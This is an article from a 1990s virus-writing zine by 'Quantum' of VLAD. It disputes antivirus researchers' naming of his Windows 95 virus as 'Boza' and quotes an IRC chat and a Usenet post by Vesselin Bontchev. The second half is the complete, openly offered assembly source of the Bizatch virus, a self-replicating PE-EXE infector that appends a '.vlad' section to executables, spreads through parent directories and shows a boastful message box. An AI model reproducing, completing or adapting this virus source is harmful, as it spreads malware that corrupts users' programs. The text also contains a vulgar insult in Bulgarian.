The Boza Situation by Quantum / VLAD ------------------------------------ On the 29th of January 1996 I was directed to an article at http://www.sophos.com about the "world's first win95 virus". Although the article stated that the virus was written in Australia - it did not state by whom the virus was written, and even though vlad was mentioned (the new object created by Bizatch is ".vlad") it does not actually state we wrote it. While I was investigating the appearance, I had this conversation with the #antivirus moderator, Hermanni: ----------------------------------------------------------------------------- -> *hermanni* you conscious ? yeah. -> *hermanni* I dont know you.. and I doubt you know me.. but I hear you are rather well known in the AV community *Hermanni* no, i don't think i know you. -> *hermanni* neways.. do you happen to know a guy by the name of Paul Ducklin ? AVer with a group called Sophos.. ? *Hermanni* yes, i know paul. duck@sophos.com -> *hermanni* ok.. he has written an article and had it placed on the sophos www site.. it is about the worlds first win95 virus.. -> *hermanni* I wrote this virus and I have mailed him at that address to tell him this and I have gotten no reply -> *hermanni* you see.. he has plucked a name for the virus out of the air he calls it "boza" .. even tho there are massive ascii strings in it clearly stating that the virus is called "bizatch" -> *hermanni* eg Please note: the name of this virus is [Bizatch] written by Quantum of VLAD -> *hermanni* rather annoying.. *Hermanni* yes, we're calling to 'Boza' as well. it's a good name. -> *hermanni* it's NOT a good name.. where did you get "boza" from ?!!? *Hermanni* well, we called it _3192 for some time, then somebody thought 'Boza' would be more descriptive. *Hermanni* i believe solomon and mcafee are calling it Boza as well. -> *hermanni* calling it boza is not in your best interests.. paul ducklin is -> *hermanni* going to look rather silly when vlad 6 comes out and it is -> *hermanni* painfully obvious that the name was made up and the true name -> *hermanni* was in the middle of the virus.. did you all even look for -> *hermanni* strings ? *Hermanni* hey, the name has already been decided. *Hermanni* too late to complain, i'm afraid. *Hermanni* do you have any idea how painful it is to get all the antivirus venders to change a name of a virus? -> *hermanni* no.. the name was chosen when I wrote the virus.. the name was choosen when it escaped from our test systems and spread to every fewl who copies win95 executables.. -> *hermanni* are you aware of how annoying it is to sit and choose a virus name only to have it ignored by AV "researchers" ? too bad, i gotta go chat with you another time. bye fine.. perhaps Virus Bulletin Magazine will do a better job and if they do.. on your square head be it *** QuantumG has left channel #antivirus ----------------------------------------------------------------------------- Generally, I think anti-virus authors need to adopt a much more professional attitude. Contrary to Paul Ducklin's claims, he (and Sophos) were not the first antivirus company to discover this virus. It seems that AVP was the first to "discover" it: ----------------------------------------------------------------------------- Win95.Boza It is not a dangerous parasitic NewEXE(PE)-virus. It searches for EXE-files, checks the files for PE signature, then creates in EXE-file new section named ".vlad", and writes its code into that section. While infecting that virus uses calls to functions GetDir, SetDir, FindFirst, FindNext, OpenFile, LSeek, Read, Write, and CloseFile. First, it gets the current directory, and checks the Windows95 kernel for some specific code. Then the virus searches for .EXE-files, and checks them for PE signature. Then the virus increases NumberOfSections field in PE-header, writes into the file new Section Header that describes new Section in the file, and writes itself to the end of the file. While executing the virus infects up to 3 files, and looks for .EXE-files in parent directories, if there are no more .EXE-files in the current one. Before return to the host program the virus restores the current directory. The virus checks some data (the system date?) and in some cases displays the messages: Bizatch by Quantum / VLAD The taste of fame just got tastier! VLAD Australia does it again with the world's first Win95 Virus From the old school to the new.. Metabolis Qark Darkman Automag Antigen RhinceWind Quantum Absolute Overlord CoKe The virus also contains the internal text strings: .vlad Please note: the name of this virus is [Bizatch] written by Quantum of VLAD The virus is not bugs-free, and in some cases Windows95 displays the error message while executing of infected EXE-files. ----------------------------------------------------------------------------- The claim of bugs in the virus are not without reason. There ARE bugs in the "Boza" virus. As stated - Boza is a beta of Bizatch. The bugs are fixed in the final release (thus the word beta!). (Quantum made a slight error here in the first release of vlad#6, on behalf of him, I'd like to apologise to Sara Gordon. In the future he will make sure he confirms any information he receives.) Looking through the alt.comp.virus news area, Metabolis came across a posting by Vesselin Bontchev. He has replied to it and I will include that reply here: ----------------------------------------------------------------------------- >> This morning on local news programs they are reporting (from the UK) >> discovery of a virus out of Bulgaria called the BOZA virus, which >> purportedly infects only Windows 95 systems, plus some related executable >> files, and displays a message...anyone heard of this or is this just >> another "chicken little" story... > The story is rather funny, folks. Here are some "insider" details. > First, the main thing in the story is right - the first Win95-specific > virus (or, more exactly, the first PE-EXE infector) has been found. > The rest is... well... a news report. > The virus is written by the Australian virus writing group VLAD. It > was intended to be published in the next issue of their virus writing > electronic newsletter. However, they were obviously so proud with what > they have done, that they didn't have the patience to wait for the > official release of the newsletter and "leaked" the virus to the > anti-virus people. After all, the "avers" know more than anyone else > about viruses, so they should be the most able to appreciate the new > "achievement". What you anti virus people have, is a beta of our virus. We gave it to a couple of people to test for us, and all of a sudden you guys seem to have the source. Leaking source to you would be the last thing I'd do. > I first heard about this virus from a contact of mine in Germany - but > didn't get a sample. (And didn't insist one one, BTW. Big deal, a > PE-EXE infector. When it appears, we'll see it.) A few days ago we > (CARO) got a sample sent to us by one of our members - Eugene > Kaspersky; the author of AVP. Another CARO member works for the > British anti-virus company Sophos. Obviously, Sophos have decided that > the virus is worth making a noise about it in the media and has > published a press release - which then has been copied and interpreted > freely by the major media agencies. Indeed, yet another media scare which will make you anti virus people a lot of money, I mean come on.. stop complaining. We line your pockets. > I, personally, think that the virus is not worth the noise. C'mon, > folks, it is just a silly non-resident EXE-only infector, which works > only in 32-bibt environments using the PE-EXE format (like Win95, > WfW+WinG, or WinNT). FYI, "PE" stands for "Portable Executable". Such > programs are supposed to be able to run in all the three environments > mentioned above. On the top of that, the virus is buggy as hell - > infected files sometimes become megabytes long. In short, it has > virtually zero chances to spread and become a threat. On the top of > that, the media quoted Sophos as "one British company", so they didn't > get even advertising value from their press release. And it was > certainly not them who discovered the virus. Well gee, I wonder why the virus is buggy.. it's a beta!! Not supposed to be released. You'll have to wait for the magazine to get the full release. As for it being silly, well.. do you see any others around? We had to start somewhere.. > Now, about the virus name. That's the finniest part of the story. The > virus contains several text strings, among which the phrase "Please > note: the name of this virus is [Bizatch] written by Quantum of VLAD". > It seemed that the virus writer who goes under the handle "Quantum" > *very* much wanted to have "his" virus named "Bizatch". Well, we're > not in the business of satisfying the virus writers' need for fame, so > we (CARO) decided to name the virus differently, just inspite. :-) Do you guys have anything better to be doing other than spiting virus authors? > But how to name it? Some trivial name was proposed - like V32 (for > 32-bit virus), but that looked too generic to me. Then I had an > inspiration! The wannabe name of the virus sounded a bit like the > [ABulgarian word "boza". In Bulgarian (and probably in Turkish), this > word means a drink made of millit (and, as the rumour goes, of candies > that have spoiled), which is semi-liquid and tends to ferment quickly > (has to be consumed within 48 hours, or it gets spoiled) and has about > 0.5% alcohol. It is something I call "the undrinkable Bulgarian > drink", because most foreigners find it of horrible taste and tend to > throw up after drinking it - while I (and many Bulgarians) find it > delicious. :-) The drink has a light-brown color, is semi-liquid and > looks like - yes, you guessed it. > Furthermore, there is a Bulgarian slang expression "this is a complete > 'boza'", meaning that something is totally messed-up/screwed-up (it's > used only for things; not for situations). This is the expression a > Bulgarian would use when faced with spagetti code or an incredibly > buggy program. (Right, Windoze is a complete 'boza' too.) Since the > virus in question is rather buggy, since there is at least one > Bulgarian virus writer in Australia (going by the handle "Levski"), > and since the term has a slightly offensive meaning when applied to a > program, I thought that it would be a perfect name for this particular > virus. Well, so it stuck. (The 'boza' is a sticky drink too.) :-) Levski would like to code a virus I'm sure, but at this moment in time writing anything in asm would be an impossibility. Mainly because he isn't a coder. Next time you want to accuse someone of something, get your facts straight first. > So, to summarize, yes, the Boza virus really exists, yes, it displays > a message in a window praising its creators, and no, it is not any > serious threat. As usual, you can ignore almost everything the media > says about computer viruses. It's real but it's not the end of the > world, folks. Just yet another stupid virus out there - one which > (thank goodness) has no chances to spread. Smuch mi kura.. kogato razbirash kakvoto prikazvash togava el pri men i mi kaji nechto. Do togava, pqlni si jobovete s pari or kakvoto nie pravime i jiveeme za. Ebi se. Metabolis. ----------------------------------------------------------------------------- Bontchev, as of most AVers, has a high opinion of himself. Giving a virus multiple names will only confuse people who have the misfortune of coming in contact with it. Whoever released this beta of a virus into the wild was very irresponsible - what's worse is they humiliated me in front of the VX and AV community. You have gained yourself at least one enemy. Here is the beta of Bizatch (the actual virus code) that AV authors around the world are calling "Boza". ----------------------------------------------------------------------------- vladseg segment para public 'vlad' assume cs:vladseg vstart: call recalc recalc: pop ebp mov eax,ebp db 2dh subme dd 30000h + (recalc - vstart) push eax sub ebp,offset recalc mov eax,[ebp + offset kern2] cmp dword ptr [eax],5350fc9ch jnz notkern2 mov eax,[ebp + offset kern2] jmp movit notkern2: mov eax,[ebp + offset kern1] cmp dword ptr [eax],5350fc9ch jnz nopayload mov eax,[ebp + offset kern1] movit: mov [ebp + offset kern],eax cld lea eax,[ebp + offset orgdir] push eax push 255 call GetCurDir mov byte ptr [ebp + offset countinfect],0 infectdir: lea eax,[ebp + offset win32_data_thang] push eax lea eax,[ebp + offset fname] push eax call FindFile mov dword ptr [ebp + offset searchhandle],eax cmp eax,-1 jz foundnothing gofile: push 0 push dword ptr [ebp + offset fileattr] push 3 push 0 push 0 push 80000000h + 40000000h lea eax,[ebp + offset fullname] push eax call CreateFile mov dword ptr [ebp + offset ahand],eax cmp eax,-1 jz findnextone push 0 push 0 push 3ch push dword ptr [ebp + offset ahand] call SetFilePointer push 0 lea eax,[ebp + offset bytesread] push eax push 4 lea eax,[ebp + offset peheaderoffset] push eax push dword ptr [ebp + offset ahand] call ReadFile push 0 push 0 push dword ptr [ebp + offset peheaderoffset] push dword ptr [ebp + offset ahand] call SetFilePointer push 0 lea eax,[ebp + offset bytesread] push eax push 58h lea eax,[ebp + offset peheader] push eax push dword ptr [ebp + offset ahand] call ReadFile cmp word ptr [ebp + offset peheader],'EP' jnz notape cmp word ptr [ebp + offset peheader + 4ch],0F00Dh jz notape push 0 push 0 push dword ptr [ebp + offset peheaderoffset] push dword ptr [ebp + offset ahand] call SetFilePointer push 0 lea eax,[ebp + offset bytesread] push eax push dword ptr [ebp + offset headersize] lea eax,[ebp + offset peheader] push eax push dword ptr [ebp + offset ahand] call ReadFile mov word ptr [ebp + offset peheader + 4ch],0F00Dh xor eax,eax mov ax, word ptr [ebp + offset NtHeaderSize] add eax,18h mov dword ptr [ebp + offset ObjectTableoffset],eax mov esi,dword ptr [ebp + offset ObjectTableoffset] lea eax,[ebp + offset peheader] add esi,eax xor eax,eax mov ax,[ebp + offset numObj] mov ecx,40 xor edx,edx mul ecx add esi,eax inc word ptr [ebp + offset numObj] ; inc the number of objects lea edi,[ebp + offset newobject] xchg edi,esi mov eax,[edi-5*8+8] add eax,[edi-5*8+12] mov ecx,dword ptr [ebp + offset objalign] xor edx,edx div ecx inc eax mul ecx mov dword ptr [ebp + offset RVA],eax mov ecx,dword ptr [ebp + offset filealign] mov eax,vend-vstart xor edx,edx div ecx inc eax mul ecx mov dword ptr [ebp + offset physicalsize],eax mov ecx,dword ptr [ebp + offset objalign] mov eax,vend - vstart + 1000h xor edx,edx div ecx inc eax mul ecx mov dword ptr [ebp + offset virtualsize],eax mov eax,[edi-5*8+20] add eax,[edi-5*8+16] mov ecx,dword ptr [ebp + offset filealign] xor edx,edx div ecx inc eax mul ecx mov dword ptr [ebp + offset physicaloffset],eax mov eax,vend-vstart+1000h add eax,dword ptr [ebp + offset imagesize] mov ecx,[ebp + offset objalign] xor edx,edx div ecx inc eax mul ecx mov dword ptr [ebp + offset imagesize],eax mov ecx,10 rep movsd mov eax,dword ptr [ebp + offset RVA] mov ebx,dword ptr [ebp + offset entrypointRVA] mov dword ptr [ebp + offset entrypointRVA],eax sub eax,ebx add eax,5 mov dword ptr [ebp + offset subme],eax push 0 push 0 push dword ptr [ebp + offset peheaderoffset] push dword ptr [ebp + offset ahand] call SetFilePointer push 0 lea eax,[ebp + offset bytesread] push eax push dword ptr [ebp + offset headersize] lea eax,[ebp + offset peheader] push eax push dword ptr [ebp + offset ahand] call WriteFile inc byte ptr [ebp + offset countinfect] push 0 push 0 push dword ptr [ebp + offset physicaloffset] push dword ptr [ebp + offset ahand] call SetFilePointer push 0 lea eax,[ebp + offset bytesread] push eax push vend-vstart lea eax,[ebp + offset vstart] push eax push dword ptr [ebp + offset ahand] call WriteFile notape: push dword ptr [ebp + offset ahand] call CloseFile findnextone: cmp byte ptr [ebp + offset countinfect],3 jz outty lea eax,[ebp + offset win32_data_thang] push eax push dword ptr [ebp + offset searchhandle] call FindNext or eax,eax jnz gofile foundnothing: xor eax,eax lea edi,[ebp + offset tempdir] mov ecx,256/4 rep stosd lea edi,[ebp + offset tempdir1] mov ecx,256/4 rep stosd lea esi,[ebp + offset tempdir] push esi push 255 call GetCurDir lea eax,[ebp + offset dotdot] push eax call SetCurDir lea edi,[ebp + offset tempdir1] push edi push 255 call GetCurDir mov ecx,256/4 rep cmpsd jnz infectdir outty: lea eax,[ebp + offset orgdir] push eax call SetCurDir lea eax,[ebp + offset systimestruct] push eax call GetTime cmp word ptr [ebp + offset day],31 jnz nopayload push 1000h lea eax,[ebp + offset boxtitle] push eax lea eax,[ebp + offset boxmsg] push eax push 0 call MsgBox nopayload: pop eax jmp eax kern dd 0BFF93B95h kern1 dd 0BFF93B95h kern2 dd 0BFF93C1Dh GetCurDir: push 0BFF77744h jmp [ebp + offset kern] SetCurDir: push 0BFF7771Dh jmp [ebp + offset kern] GetTime: cmp [ebp + offset kern],0BFF93B95h jnz gettimekern2 push 0BFF9D0B6h jmp [ebp + offset kern] gettimekern2: push 0BFF9D14eh jmp [ebp + offset kern] MsgBox: push 0BFF638D9h jmp [ebp + offset kern] FindFile: push 0BFF77893h jmp [ebp + offset kern] FindNext: push 0BFF778CBh jmp [ebp + offset kern] CreateFile: push 0BFF77817h jmp [ebp + offset kern] SetFilePointer: push 0BFF76FA0h jmp [ebp + offset kern] ReadFile: push 0BFF75806h jmp [ebp + offset kern] WriteFile: push 0BFF7580Dh jmp [ebp + offset kern] CloseFile: push 0BFF7BC72h jmp [ebp + offset kern] countinfect db 0 win32_data_thang: fileattr dd 0 createtime dd 0,0 lastaccesstime dd 0,0 lastwritetime dd 0,0 filesize dd 0,0 resv dd 0,0 fullname db 256 dup (0) realname db 14 dup (0) boxtitle db "Bizatch by Quantum / VLAD",0 boxmsg db "The taste of fame just got tastier!",0dh db "VLAD Australia does it again with the world's first Win95 Virus" db 0dh,0dh db 9,"From the old school to the new.. ",0dh,0dh db 9,"Metabolis",0dh db 9,"Qark",0dh db 9,"Darkman",0dh db 9,"Automag",0dh db 9,"Antigen",0dh db 9,"RhinceWind",0dh db 9,"Quantum",0dh db 9,"Absolute Overlord",0dh db 9,"CoKe",0 message db "Please note: the name of this virus is [Bizatch]" db " written by Quantum of VLAD",0 orgdir db 256 dup (0) tempdir db 256 dup (0) tempdir1 db 256 dup (0) dotdot db "..",0 systimestruct: dw 0,0,0 day dw 0 dw 0,0,0,0 searchhandle dd 0 fname db '*.exe',0 ahand dd 0 peheaderoffset dd 0 ObjectTableoffset dd 0 bytesread dd 0 newobject: oname db ".vlad",0,0,0 virtualsize dd 0 RVA dd 0 physicalsize dd 0 physicaloffset dd 0 reserved dd 0,0,0 objectflags db 40h,0,0,0c0h peheader: signature dd 0 cputype dw 0 numObj dw 0 db 3*4 dup (0) NtHeaderSize dw 0 Flags dw 0 db 4*4 dup (0) entrypointRVA dd 0 db 3*4 dup (0) objalign dd 0 filealign dd 0 db 4*4 dup (0) imagesize dd 0 headersize dd 0 vend: db 1000h dup (0) ends end vstart ;------------------------------------------------------------------------------